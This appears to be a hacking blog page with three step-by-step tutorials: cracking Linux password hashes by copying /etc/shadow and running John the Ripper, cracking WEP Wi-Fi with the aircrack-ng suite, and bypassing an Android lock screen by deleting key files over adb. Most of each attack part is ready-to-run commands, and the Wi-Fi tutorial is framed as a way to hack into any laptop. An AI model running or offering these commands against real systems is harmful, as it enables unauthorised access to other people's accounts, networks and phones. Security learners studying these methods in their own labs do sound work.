Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

How to Crack User Passwords in a Linux System

In recent blogs, I've demonstrated how to grab password hashes remotely using Metasploit's meterpreter and pwdump. Once we have the Windows passwords from the SAM file, we can then crack these hashes using tools such as Cain and Abel.
In this article, we'll look at how to grab the password hashes from a Linux system and crack the hashes using probably the most widely used password cracking tool out there, John the Ripper.
Let's boot up BackTrack and get hacking!

Where Linux Passwords Are Stored

Linux passwords are stored in the /etc/passwd file in cleartext in older systems and in /etc/shadow file in hash form on newer systems. We should expect that the passwords on anything other than old legacy systems to be stored in /etc/shadow
Step 1: Create Some User Accounts
Since our BackTrack system probably doesn't have many users on it other than our root account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".
I've purposely chosen dictionary words as the complexity of the password is inversely related to the time necessary to crack it. One of the nice features of John the Ripper is that it will try to use a dictionary attack first. If that fails, it will try a hybrid attack. And only if that fails will it attempt a brute-force attack, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we now need to open John the Ripper. John the Ripper is a simple, but powerful password cracker without a GUI (this helps to make it faster as GUIs consume resources).
We can access it from BackTrack by going to the BackTrack button on the bottom left, then BacktrackPrivilege EscalationPassword AttacksOffline Attacks, and finally select John the Ripper from the multiple password cracking tools available.
If you selected the correct menu item, it will open a terminal that looks like this.
By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:
  • bt > john -test
This command will send John the Ripper through a variety of benchmark tests to estimate how long it will take to break the passwords on your system. Your terminal will look something like this.
Now that John has estimated how long each of the encryption schemes will take to crack, let's put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our current directory along with the /etc/passwd file, then "unshadow" them and store them in file we'll call passwords. So, let's type both:
  • bt > cp /etc/shadow ./
  • bt > cp /etc/passwd ./
In Linux, the cp command means copy and the ./ represents our current directory. So this command says, copy the contents of /etc/shadow to my current directory. We do the same for the /etc/passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that John can do its magic.
  • bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.
  • bt > john passwords
John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked all three of ours in a matter of seconds! Of course, more complex passwords will take significantly more time, but all we need is just one user with a simple password and we have access to the account in seconds.
It's also important to note that any password cracker is only as good as its word list. For more complex or hybrid passwords, you probably want to use a password list containing far more passwords, including hybrid passwords such "p@$$w0rd" that combine special characters into words.


Crack Wifi Password (WEP) with Kali Linux



wep hack

We can easily crack Wifi (WEP security) by using Kali Linux in approximately 10-15 min by following these steps give below.
  

Open terminal and follow the following procedure to hack into any laptop

Steps:

1. Find out the name of your wireless adapter by typing:
    ifconfig

2. Enable Monitor mode by typing:
    airmon-ng start wlan0

3. Start capturing packets by typing:
    airodump-ng mon0

4. Store the captured packets in a file by typing:
    airodump-ng mon0 --write name_of_file

5. Crack the wifi after 10000 packets minimum by typing:
    aircrack-ng name_of_file-01.cap



Note:
1.Only wep type wifi password can cracked using these step.
2. If you have any problem comment below.

Bypassing Android Lock Screen using Linux

       
Linux Terminal and adb tools



 What You Need:







  1. A computer running a Linux distro or Windows+Cygwin
  2. USB cable to connect your phone to the PC
  3. Adb installed


How to install adb:

  1. Open Terminal
  2. Type:
    Code:
    'sudo apt-get install android-tools-adb'
  3. Hit [Enter] and follow the instructions until everything is installed.


INSTRUCTIONS:

  1. Connect you (turned on) Phone to the Computer via USB.
  2. Open a terminal window.
  3. Type:
    Code:
    adb devices
    adb shell
    cd data/system
    su
    rm *.key
  4. Reboot your system.


If you followed the steps properly, you have successfully bypassed android lock screen.


Note: Do not use this trick to trespass someone's privacy which is considered a punishable crime.